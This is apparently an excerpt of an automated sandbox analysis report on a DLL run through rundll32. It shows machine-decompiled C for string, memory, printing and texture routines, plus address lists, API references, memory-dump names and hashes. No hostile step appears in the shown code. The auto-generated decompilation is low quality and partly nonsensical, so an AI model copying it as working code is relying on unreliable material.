												if(_t154 == 0) {
													goto L10;
												} else {
													goto L8;
												}
											}
										} else {
											_t246[0xe] = _t230;
											if(_t243 == 0) {
												L33:
												 *_t246 = 8;
												_t246[0x19] = _t210;
												_t155 = E10029100();
												_t232 = _t246[0xe];
												_t243 = _t155;
												 *(_t246[0x18]) = _t243;
												if(_t243 == 0) {
													L35:
													_t142 = _t243;
													_t183 = 0xfffffff4;
													L26:
													if(_t142 != 0) {
														L11:
														if( *_t142 == 0) {
															 *_t246 =  &(_t142[1]);
															E100290E0();
															 *_t246 = _t246[0x18];
															E100290E0();
														}
													}
													 *_t246 = _t246[0xe];
													L100290D0();
													 *_t246 = _t246[0xf];
													L100290D0();
													return _t183;
												} else {
													_t210 = _t246[0x19];
													if(_t232 != 0) {
														goto L8;
													} else {
														goto L35;
													}
												}
											} else {
												L8:
												_t157 = _t246[0xf];
												_t246[8] = _t157;
												if(_t217 == 0 || _t157 != 0) {
													if(_t246[4] == 0) {
														_t159 =  *_t243;
														if(_t246[8] == 0) {
															goto L39;
														} else {
															_t246[0x19] = _t210;
															_t246[2] = 8;
															_t246[1] = _t159 + 1;
															 *_t246 = _t243[1];
															_t165 = E10029010();
															_t210 = _t246[0x19];
															_t190 = _t165;
															if(_t165 == 0) {
																goto L10;
															} else {
																_t243[1] = _t165;
																_t159 =  *_t243;
																goto L19;
															}
														}
													} else {
														if((_t246[0x1a] & 0x00000010) != 0) {
															 *_t246 = _t232;
															_t246[0x19] = _t210;
															L100290D0();
															 *_t246 = _t246[0xf];
															L100290D0();
															_t210 = _t246[0x19];
															continue;
														} else {
															_t192 =  *(_t246[4] + 4);
															if(_t246[8] == 0 || (_t246[0x1a] & 0x00000020) == 0) {
																 *_t246 = _t192;
																_t246[0x19] = _t210;
																L100290D0();
																_t212 = _t246[0x19];
																L18:
																_t246[0x19] = _t212;
																 *_t246 =  *(_t246[4]);
																L100290D0();
																_t221 =  *_t243;
																_t190 = _t243[1];
																_t213 = _t246[4];
																_t34 = _t221 - 1; // 0x3
																_t159 = _t34;
																 *_t243 = _t159;
																 *_t213 =  *(_t190 + _t159 * 8);
																 *((intOrPtr*)(_t213 + 4)) =  *((intOrPtr*)(_t190 + 4 + _t159 * 8));
																_t210 = _t246[0x19];
																L19:
																_t234 = _t246[0xf];
																if(_t234 == 0) {
																	goto L39;
																}
																continue;
															} else {
																goto L42;
															}
														}
													}
												} else {
													goto L10;
												}
											}
										}
									}
								}
							}
							L52:
						}
						return 0;
						goto L52;
						L39:
						if(_t159 == 0) {
							_t246[0x19] = _t210;
							 *_t246 =  &(_t243[1]);
							E100290E0();
							 *_t246 = _t246[0x18];
							E100290E0();
							_t210 = _t246[0x19];
						}
						_t246[0x19] = _t210;
						 *_t246 =  &(_t246[0xe]);
						E100290E0();
						_t210 = _t246[0x19];
						goto L21;
					}
				}
				L10:
				_t142 = _t243;
				_t183 = 0xfffffff4;
				goto L11;
			}

0x10012049
0x10012049
0x10012050
0x10012050
0x10012050
0x10012053
0x10012057
0x10012060
0x10012066
0x10012069
0x10012072
0x10012075
0x10012077
0x1001207b
0x1001207f
0x10012086
0x00000000
0x00000000
0x1001208c
0x1001208f
0x10012093
0x10012096
0x1001209f
0x100120a1
0x100120a5
0x100120a9
0x100120ad
0x100120b1
0x1001211b
0x10012157
0x10012159
0x10012162
0x1001216b
0x1001216b
0x10012122
0x10012171
0x10012175
0x1001217c
0x10012182
0x10012189
0x1001218e
0x1001218e
0x10012129
0x1001212b
0x10012135
0x10012138
0x1001213b
0x10012142
0x10012147
0x10012147
0x10012129
0x100120b3
0x100120bb
0x100120c7
0x100120c7
0x100120cd
0x100120d0
0x100120d9
0x100120dd
0x100120e1
0x10011e83
0x10011e83
0x10011e83
0x10011e89
0x00000000
0x00000000
0x10011e8f
0x10011e93
0x10011e97
0x10011e9a
0x10011e9c
0x10011e9f
0x10011e9f
0x10011ea7
0x10011eaa
0x00000000
0x00000000
0x10011d63
0x10011d68
0x00000000
0x10011d6e
0x10011d74
0x10011d76
0x10011d7a
0x10011d7d
0x10011d81
0x10011d8b
0x10011ec2
0x00000000
0x10011ec8
0x10011ec8
0x10011ecb
0x10011ecf
0x10011ed6
0x10011eda
0x10011ede
0x00000000
0x00000000
0x00000000
0x00000000
0x10011ede
0x10011d91
0x10011d91
0x10011d95
0x10011d97
0x10011ee4
0x10011ee4
0x10011ee6
0x00000000
0x10011d9d
0x10011d9d
0x10011d9f
0x10011da9
0x10011f30
0x10011f38
0x10011f3b
0x10011f3f
0x10011f45
0x10011f49
0x10011f4e
0x10011f52
0x10011f52
0x10011db5
0x10011f00
0x10011f03
0x10011f07
0x10011f0e
0x10011f12
0x10011f16
0x10011f18
0x00000000
0x10011f1a
0x10011f1c
0x00000000
0x10011f22
0x00000000
0x10011f22
0x10011f1c
0x10011dbb
0x10011dbb
0x10011dc1
0x10011f80
0x10011f80
0x10011f87
0x10011f8b
0x10011f90
0x10011f94
0x10011f9c
0x10011f9e
0x10011fac
0x10011fac
0x10011fae
0x10011eeb
0x10011eed
0x10011dde
0x10011de2
0x10011f63
0x10011f66
0x10011f6f
0x10011f72
0x10011f72
0x10011de2
0x10011dec
0x10011def
0x10011df8
0x10011dfb
0x10011e09
0x10011fa0
0x10011fa2
0x10011fa6
0x00000000
0x00000000
0x00000000
0x00000000
0x10011fa6
0x10011dc7
0x10011dc7
0x10011dc7
0x10011dcd
0x10011dd1
0x10011e16
0x10011fc4
0x10011fc9
0x00000000
0x10011fcb
0x10011fcb
0x10011fd5
0x10011fd9
0x10011fe0
0x10011fe3
0x10011fe8
0x10011fee
0x10011ff0
0x00000000
0x10011ff6
0x10011ff6
0x10011ff9
0x00000000
0x10011ff9
0x10011ff0
0x10011e1c
0x10011e21
0x100120f0
0x100120f3
0x100120f7
0x10012100
0x10012103
0x10012108
0x00000000
0x10011e27
0x10011e31
0x10011e34
0x10011e41
0x10011e44
0x10011e48
0x10011e4d
0x10011e51
0x10011e51
0x10011e5b
0x10011e5e
0x10011e63
0x10011e66
0x10011e69
0x10011e6d
0x10011e6d
0x10011e70
0x10011e7a
0x10011e7c
0x10011e7f
0x10011e83
0x10011e83
0x10011e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10011e34
0x10011e21
0x00000000
0x00000000
0x00000000
0x10011dd1
0x10011dc1
0x10011db5
0x10011d97
0x10011d8b
0x00000000
0x10011d68
0x10011ebb
0x00000000
0x10012008
0x1001200a
0x10012028
0x1001202f
0x10012032
0x1001203b
0x1001203e
0x10012043
0x10012043
0x1001200c
0x10012014
0x10012017
0x1001201c
0x00000000
0x1001201c
0x10011e83
0x10011dd7
0x10011dd7
0x10011dd9
0x00000000

APIs

strlen.MSVCRT ref: 1001205B
strlen.MSVCRT ref: 10012069
mv_realloc.F086 ref: 1001207F

Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB

mv_freep.F086 ref: 100120D0

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
Instruction ID: 9bf475a18fd4cb1c0505352b53a299a598f586f68b75c8a149e966f8cd1839f1
Opcode Fuzzy Hash: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
Instruction Fuzzy Hash: 0031CDB99087058FC744CF29C18045AFBE1FF88718F558A6EE889AB310D731EA45CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A650 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1000A66C
mv_freep.F086 ref: 1000A69C
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A6AB

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireReleasemv_freep
String ID:
API String ID: 2444013405-0
Opcode ID: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
Instruction ID: c3c698d3df7831113588d9bdc2aa75e8a835319d0c3e7d0db2d9c6c4417e318c
Opcode Fuzzy Hash: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
Instruction Fuzzy Hash: 7B21D6B5608701CFD700EF25D5C491ABBF4EF85280F06C969E8898B31AD731E885CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10012239 Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E10012239(intOrPtr __edi, intOrPtr* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a40, char _a44, char _a61, char _a64, intOrPtr* _a1120, intOrPtr _a1124) {
				signed int _t34;
				char* _t49;
				intOrPtr* _t51;
				intOrPtr _t56;
				void* _t57;
				intOrPtr* _t60;
				char* _t64;
				intOrPtr* _t66;

				_t60 = __esi;
				_t56 = __edi;
				_a8 = 0xffffffff;
				_t49 =  &_a64;
				_a4 = 0x40;
				_t64 =  &_a61;
				 *_t66 = _t49;
				L10008880(_t49, __edi, __esi, _t64);
				_t34 = 0;
				_t51 = _t60;
				_a1124 = _t56;
				_t57 = 0;
				if( *_t51 > 0) {
					while(1) {
						_t60 =  *((intOrPtr*)(_t51 + 4)) + _t34 * 8;
						if(_t60 == 0) {
							goto L5;
						}
						if(_t57 != 0) {
							 *_t66 = _t49;
							_a8 = 1;
							_a4 =  &_a40;
							_a1120 = _t51;
							L10008F30();
							_t51 = _a1120;
						}
						_a8 = _t64;
						_a12 = 1;
						_t57 = _t57 + 1;
						_a16 = 0;
						_a1120 = _t51;
						 *_t66 = _t49;
						_a4 =  *_t60;
						L10009730();
						_a8 = 1;
						_a4 =  &_a44;
						 *_t66 = _t49;
						L10008F30();
						_a16 = 0;
						_a12 = 1;
						_a8 = _t64;
						 *_t66 = _t49;
						_a4 =  *((intOrPtr*)(_t60 + 4));
						L10009730();
						_t51 = _a1120;
						_t34 = _t60 + 1;
						if( *_t51 > _t34) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				 *_t66 = _t49;
				_a4 = _a1124;
				return E10009690(_t49, _t51, _a1124, _t60);
			}

0x10012239
0x10012239
0x1001224a
0x1001224e
0x10012252
0x10012256
0x1001225a
0x1001225d
0x10012262
0x10012264
0x10012266
0x10012271
0x10012273
0x10012279
0x1001227c
0x10012281
0x00000000
0x00000000
0x10012289
0x10012330
0x10012338
0x10012340
0x10012344
0x1001234b
0x10012350
0x10012350
0x1001228f
0x1001229a
0x1001229e
0x1001229f
0x100122a3
0x100122ac
0x100122af
0x100122b3
0x100122c1
0x100122c5
0x100122c9
0x100122cc
0x100122d3
0x100122dc
0x100122e0
0x100122e7
0x100122ea
0x100122ee
0x100122f3
0x10012302
0x10012307
0x00000000
0x00000000
0x00000000
0x10012307
0x10012279
0x1001230d
0x1001230d
0x10012317
0x1001232a

APIs

mv_bprint_init.F086 ref: 1001225D
mv_bprint_escape.F086 ref: 100122B3
mv_bprint_append_data.F086 ref: 100122CC
mv_bprint_escape.F086 ref: 100122EE
mv_bprint_finalize.F086 ref: 1001231B
mv_bprint_append_data.F086 ref: 1001234B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
String ID:
API String ID: 3283265872-0
Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10011483 Relevance: 7.6, APIs: 5, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E10011483(void* __eax, intOrPtr* __ebx, void* __ecx, void* __eflags) {
				intOrPtr* _t60;

				 *__esp = __eax;
				__edi = __eax;
				__esp[7] = __ecx;
				__eax = strlen(??);
				__ecx = __esp[7];
				 *__esp = __esp[7];
				__esi = __eax;
				__eax = strlen(??);
				 *__esp = __edi;
				__edx = __eax;
				__esp[7] = __eax;
				_t26 = __eax + 1; // 0x1
				__eax = __esi + _t26;
				__esp[1] = __esi + _t26;
				__eax = L10028DA0();
				if(__eax != 0) {
					__edx = __esp[7];
					__edi = __eax + __esi;
					__esi = __esp[0xb];
					__ecx = __edx + 1;
					if(__ecx >= 8) {
						if((__edi & 0x00000001) != 0) {
							__ecx =  *__esi & 0x000000ff;
							__edi = __edi + 1;
							__esi = __esi + 1;
							 *((char*)(__edi - 1)) = __cl;
							__ecx = __edx;
						}
						if((__edi & 0x00000002) != 0) {
							__edx =  *__esi & 0x0000ffff;
							__edi = __edi + 2;
							__esi = __esi + 2;
							__ecx = __ecx - 2;
							 *((short*)(__edi - 2)) = __dx;
						}
						if((__edi & 0x00000004) != 0) {
							__edx =  *__esi;
							__edi = __edi + 4;
							__esi = __esi + 4;
							__ecx = __ecx - 4;
							 *(__edi - 4) = __edx;
						}
					}
					__esp[7] = __eax;
					__edx =  &(__esp[0xb]);
					__eax = memcpy(__edi, __esi, __ecx);
					__esi + __ecx = __esi + __ecx + __ecx;
					__ecx = 0;
					E100290E0(__edx);
					__eax = __esp[7];
					__esp[0xb] = __esp[7];
					__eax =  *__ebp;
					 *__esp =  *__ebp;
					L100290D0();
					__eax =  *__ebx;
					__ecx = __ebx[1];
					_t8 = __eax - 1; // -1
					__esi = _t8;
					 *__ebx = __esi;
					__eax =  *(__ecx + __esi * 8);
					__edx =  *(__ecx + 4 + __esi * 8);
					 *__ebp =  *(__ecx + __esi * 8);
					__ebp[1] =  *(__ecx + 4 + __esi * 8);
					__eax = __esp[0xb];
					if(__eax == 0) {
						if(__esi == 0) {
							E100290E0(__ebx);
							__eax = __esp[0x14];
							E100290E0(__esp[0x14]);
						}
						__eax =  &(__esp[0xa]);
						__esi = 0;
						E100290E0( &(__esp[0xa]));
						goto L4;
					} else {
						__edx = __ecx + __esi * 8;
						__ecx = __esp[0xa];
						__esi = __esi + 1;
						 *(__edx + 4) = __eax;
						 *__edx = __esp[0xa];
						 *__ebx = __esi;
						__esi = 0;
						L4:
						return 0xfffffff4;
					}
				}
				if( *__ebx == 0) {
					 *_t60 = __ebx + 4;
					E100290E0();
					 *_t60 =  *((intOrPtr*)(_t60 + 0x50));
					E100290E0();
				}
				 *_t60 =  *((intOrPtr*)(_t60 + 0x28));
				L100290D0();
				 *_t60 =  *((intOrPtr*)(_t60 + 0x2c));
				L100290D0();
				goto L4;
			}

0x10011488
0x1001148b
0x1001148d
0x10011491
0x10011496
0x1001149a
0x1001149d
0x1001149f
0x100114a4
0x100114a7
0x100114a9
0x100114ad
0x100114ad
0x100114b1
0x100114b5
0x100114bc
0x100114c2
0x100114c6
0x100114c9
0x100114cd
0x100114d3
0x1001151e
0x10011540
0x10011543
0x10011544
0x10011545
0x10011548
0x10011548
0x10011526
0x1001154c
0x1001154f
0x10011552
0x10011555
0x10011558
0x10011558
0x1001152e
0x10011530
0x10011532
0x10011535
0x10011538
0x1001153b
0x1001153b
0x1001152e
0x100114d5
0x100114d9
0x100114dd
0x100114dd
0x100114dd
0x100114e2
0x100114e7
0x100114eb
0x100112fc
0x100112ff
0x10011302
0x10011307
0x10011309
0x1001130c
0x1001130c
0x1001130f
0x10011311
0x10011314
0x10011318
0x1001131b
0x1001131e
0x10011324
0x1001146a
0x100114fe
0x10011503
0x1001150a
0x1001150a
0x10011470
0x10011474
0x10011479
0x00000000
0x1001132a
0x1001132a
0x1001132d
0x10011331
0x10011332
0x10011335
0x10011337
0x10011339
0x100112b6
0x100112cb
0x100112cb
0x10011324
0x10011298
0x10011413
0x10011416
0x1001141f
0x10011422
0x10011422
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x00000000

APIs

strlen.MSVCRT ref: 10011491
strlen.MSVCRT ref: 1001149F
mv_realloc.F086 ref: 100114B5

Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB

mv_freep.F086 ref: 100114E2

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
Instruction ID: 4ab28d8c1afc1d5d21c0288313e81dd6decefd2b0a989d53a21eca3f7d4547be
Opcode Fuzzy Hash: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
Instruction Fuzzy Hash: 2F21AEB8908316CFCB54DF28C08095AB7E5FF89344F558A5DE999AB301D731EA46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 100A01C0 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 100A01D9
_unlock.MSVCRT ref: 100A0201
calloc.MSVCRT ref: 100A024F

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
Instruction ID: 8fe92059074c50cb47f0fafd9c3e369871995c2eed6e667d345993090a648f63
Opcode Fuzzy Hash: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
Instruction Fuzzy Hash: A81149B1604305CFDB80DFA8C48475ABBE0EF88340F15C6A9E888CF245EB74D840CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001232B Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

mv_bprint_escape.F086 ref: 100122B3

Part of subcall function 10009730: mv_bprintf.F086(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_append_data.F086 ref: 100122CC
mv_bprint_escape.F086 ref: 100122EE
mv_bprint_finalize.F086 ref: 1001231B
mv_bprint_append_data.F086 ref: 1001234B

Part of subcall function 10008F30: mv_realloc.F086 ref: 10008F73

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
String ID:
API String ID: 1942445456-0
Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1001F3B7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1001F3B7(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr* _t61;
				intOrPtr _t62;
				intOrPtr* _t72;
				intOrPtr _t77;
				intOrPtr* _t95;
				intOrPtr _t98;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t105;

				 *((intOrPtr*)(_t104 + 0x4c)) = __ebx;
				_t77 =  *((intOrPtr*)(_t104 + 0x60));
				 *((intOrPtr*)(_t104 + 0x58)) = _t101;
				 *((intOrPtr*)(_t104 + 0x54)) = __edi;
				 *((intOrPtr*)(_t104 + 0x50)) = __esi;
				_t102 =  *((intOrPtr*)(_t77 + 0x10));
				_t95 =  *_t102;
				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 4)) + 4));
				if(_t95 == 0) {
					 *((intOrPtr*)(_t104 + 0x2c)) = 0;
					 *((intOrPtr*)(_t104 + 0x30)) = 0;
					 *((intOrPtr*)(_t104 + 0x38)) = 0;
					 *((intOrPtr*)(_t104 + 0x18)) =  *((intOrPtr*)(_t77 + 0x30));
					 *((intOrPtr*)(_t104 + 0x14)) =  *((intOrPtr*)(_t77 + 0x2c));
					 *((intOrPtr*)(_t104 + 0x1c)) = 1;
					 *((intOrPtr*)(_t104 + 0x20)) = 1;
					 *((intOrPtr*)(_t104 + 0x28)) = 1;
					 *((intOrPtr*)(_t104 + 0x24)) =  *((intOrPtr*)(_t98 + 8));
					 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t102 + 4));
					 *((intOrPtr*)(_t104 + 0x3c)) =  *((intOrPtr*)(_t102 + 8));
					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t77 + 0xc)) + 0xc))));
					 *((intOrPtr*)(_t104 + 0xc)) = _t104 + 0x10;
					 *((intOrPtr*)(_t104 + 8)) = 0;
					 *((intOrPtr*)(_t104 + 4)) = _t104 + 0x14;
					 *_t104 = _t61;
					_t62 =  *((intOrPtr*)( *_t61 + 0x14))();
					_t105 = _t104 - 0x10;
					if(_t62 < 0) {
						 *((intOrPtr*)(_t105 + 0xc)) = _t62;
						 *(_t105 + 8) = "Could not create the texture (%lx)\n";
						 *((intOrPtr*)(_t105 + 4)) = 0x10;
						 *_t105 = _t77;
						E10026560();
					} else {
						_t95 = E1001F080(_t77, _t77, 0,  *((intOrPtr*)(_t105 + 0x10)), _t95, _t98, _t102);
					}
				} else {
					 *((intOrPtr*)(_t104 + 4)) = _t104 + 0x14;
					 *_t104 = _t95;
					 *((intOrPtr*)( *_t95 + 0x28))();
					_t105 = _t104 - 8;
					if( *((intOrPtr*)(_t98 + 4)) >=  *((intOrPtr*)(_t105 + 0x20))) {
						 *_t105 = _t77;
						 *(_t105 + 8) = "Static surface pool size exceeded.\n";
						_t95 = 0;
						 *((intOrPtr*)(_t105 + 4)) = 0x10;
						E10026560();
					} else {
						_t72 =  *_t102;
						 *_t105 = _t72;
						 *((intOrPtr*)( *_t72 + 4))();
						_t105 = _t105 - 4;
						_t95 = E1001F080(_t77, _t77,  *((intOrPtr*)(_t98 + 4)),  *_t102, _t95, _t98, _t102);
					}
				}
				return _t95;
			}

0x1001f3c3
0x1001f3c7
0x1001f3cb
0x1001f3cf
0x1001f3d3
0x1001f3d7
0x1001f3dd
0x1001f3e0
0x1001f3e5
0x1001f44b
0x1001f451
0x1001f457
0x1001f45e
0x1001f467
0x1001f470
0x1001f479
0x1001f480
0x1001f484
0x1001f48b
0x1001f492
0x1001f496
0x1001f49e
0x1001f4a4
0x1001f4ac
0x1001f4b0
0x1001f4b3
0x1001f4b6
0x1001f4bb
0x1001f500
0x1001f50e
0x1001f512
0x1001f516
0x1001f519
0x1001f4bd
0x1001f4ca
0x1001f4ca
0x1001f3e7
0x1001f3ed
0x1001f3f1
0x1001f3f4
0x1001f3f7
0x1001f401
0x1001f4d8
0x1001f4e5
0x1001f4e9
0x1001f4eb
0x1001f4ef
0x1001f407
0x1001f407
0x1001f40c
0x1001f40f
0x1001f41a
0x1001f422
0x1001f422
0x1001f401
0x1001f439

APIs

mv_log.F086 ref: 1001F4EF

Part of subcall function 1001F080: mv_mallocz.F086 ref: 1001F0A0
Part of subcall function 1001F080: mv_realloc_f.F086 ref: 1001F0DD
Part of subcall function 1001F080: mv_buffer_create.F086 ref: 1001F128

Strings

Could not create the texture (%lx), xrefs: 1001F504
Static surface pool size exceeded., xrefs: 1001F4DB

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
